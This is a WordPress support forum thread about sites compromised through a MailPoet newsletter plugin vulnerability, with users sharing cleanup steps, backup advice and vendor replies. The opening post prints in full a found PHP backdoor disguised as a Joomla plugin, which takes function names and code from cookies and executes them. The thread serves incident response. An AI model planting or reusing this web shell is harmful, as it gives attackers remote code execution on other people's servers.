Title: Plugin Hacked
Last modified: August 21, 2016

---

# Plugin Hacked

 *  Resolved [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/)
 * > 2.6.8 – 2014-07-04
   >  Fixed security issue reported by Dominic
 * Well, I’m hoping this was the culprit, but regardless, our site was compromised
   via Mail Poet last week. There was a backdoor being used to send out massive 
   amounts of spam and our webhost had to shut it down.
 * Files were found in:
 * wp-content/upgrade/
    wp-content/uploads/ (a file called ajax.php) wp-content/
   uploads/wysija/themes/main/ wp-content/uploads/wysija/themes/main2/
 * These were always .php files, sometimes with a gibberish name, other times with
   a name like “ajax.php” or “index.php” where there shouldn’t have been one (in
   the themes folders).
 * The index.php file inside the “wysija/themes/main/” folders looked like this:
 *     ```
       <?php
       /**
        * @package     Joomla.Plugin.System
        * @since       1.5
        *
        *
        */
       class PlgSysJoomla {
       public function __construct() {
       $file=@$_COOKIE['ljNqe3'];
       if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
       $index=new PlgSysJoomla;
       ```
   
 * Anyway, anyone else have these issues? I updated Mail Poet, deleted all suspicious
   files, changed my FTP password, and am hoping that’s enough.
 * [https://wordpress.org/plugins/wysija-newsletters/](https://wordpress.org/plugins/wysija-newsletters/)

Viewing 8 replies - 16 through 23 (of 23 total)

[←](https://wordpress.org/support/topic/plugin-hacked-5/?output_format=md) [1](https://wordpress.org/support/topic/plugin-hacked-5/?output_format=md)
2

 *  [Fred Chapman](https://wordpress.org/support/users/fwchapman/)
 * (@fwchapman)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089489)
 * One of my client’s sites was compromised by the MailPoet vulnerability, but I
   had 3 months of weekly backups of the entire site (database, folders, and files).
   I spent 2 hours investigating the infection to determine when and where it entered
   and how far it spread. I found rogue code (base64, cookie) inserted into some
   PHP files, and even some modified CSS files. I spent 1 hour recovering the entire
   site from the most current uninfected backup. Thankfully, site restoration was
   simple, straightforward, and painless.
 * Malware infections like this one are the reason why it is critical to perform
   regular backups of your entire site. I use the BackUpWordPress plugin on every
   site I build. It is easy to set up automatic backups of both the database and
   the file system. I back up the database automatically every day and the complete
   file system automatically every week, keeping 3 months of both backups on hand,
   just in case.
 * If you’re not already making regular backups of your entire site, I highly recommend
   BackUpWordPress. You can find it here:
 * [https://wordpress.org/plugins/backupwordpress/](https://wordpress.org/plugins/backupwordpress/)
 *  [poddys](https://wordpress.org/support/users/poddys/)
 * (@poddys)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089494)
 * Great information, we got hacked too, and even though most of our site is not
   WordPress based, ALL of our PHP files had a malicious script added to the beginning.
 * I used a free Windows program “replacetext” to scan and replace the code in over
   1,000 PHP files (it also takes backups and gives a log of all changes).
 * I found a backdoor in wp-content/upload/wysija/themes/*/*.php. – there was an
   index.php which had been cleaned, but it also had a second script in the file(
   crafty!). Now that has been removed also.
 * Will update if I find anything else unusual.
 *  [poddys](https://wordpress.org/support/users/poddys/)
 * (@poddys)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089495)
 * [@fwchapman](https://wordpress.org/support/users/fwchapman/) I also use backupwordpress.
   It is an excellent plugin.
 *  [wing2go](https://wordpress.org/support/users/wing2go/)
 * (@wing2go)
 * [11 years, 5 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089518)
 * Our site was shutdown too and the hosting company citing that this plugin wysija
   newsletter might have used the website to stage attack. I have no idea, but disable
   it anyway. I wanted to have the plugin owner to comment it.
 *  [Wysija](https://wordpress.org/support/users/wysija/)
 * (@wysija)
 * [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089519)
 * Guys, always keep your MailPoet updated, there’s nothing else we can do besides
   that.
 *  [zifawebsolutions](https://wordpress.org/support/users/zifawebsolutions/)
 * (@zifawebsolutions)
 * [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089520)
 * Got rid of MailPoet plugin all together and all related files but my website 
   still won’t load. See [http://adamsparadise.com/](http://adamsparadise.com/)
 * I followed the uninstall/removal procedure from mailpoet support page and I’m
   still stuck. Help please, this is affecting my business.
 * Regards,
    Sam [sam@zifawebsolutions.com](https://wordpress.org/support/topic/plugin-hacked-5/page/2/sam@zifawebsolutions.com?output_format=md)
 *  [Wysija](https://wordpress.org/support/users/wysija/)
 * (@wysija)
 * [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089521)
 * Your website is loading fine on my end: [http://imgur.com/oPkZDf9](http://imgur.com/oPkZDf9)
 * Check the beginning of all your .php files for the malware.
 *  [zifawebsolutions](https://wordpress.org/support/users/zifawebsolutions/)
 * (@zifawebsolutions)
 * [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089522)
 * hi MailPort staff,
 * I’ve actually restored a backup I made 1 month ago, rid of your mailpoet plugin
   and upgrade wordpress to make it to work.
 * Regards,
    Sam

Viewing 8 replies - 16 through 23 (of 23 total)

[←](https://wordpress.org/support/topic/plugin-hacked-5/?output_format=md) [1](https://wordpress.org/support/topic/plugin-hacked-5/?output_format=md)
2

The topic ‘Plugin Hacked’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/wysija-newsletters_ffddcc.svg)
 * [MailPoet Newsletters (Previous)](https://wordpress.org/plugins/wysija-newsletters/)
 * [Support Threads](https://wordpress.org/support/plugin/wysija-newsletters/)
 * [Active Topics](https://wordpress.org/support/plugin/wysija-newsletters/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wysija-newsletters/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wysija-newsletters/reviews/)

 * 23 replies
 * 14 participants
 * Last reply from: [zifawebsolutions](https://wordpress.org/support/users/zifawebsolutions/)
 * Last activity: [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089522)
 * Status: resolved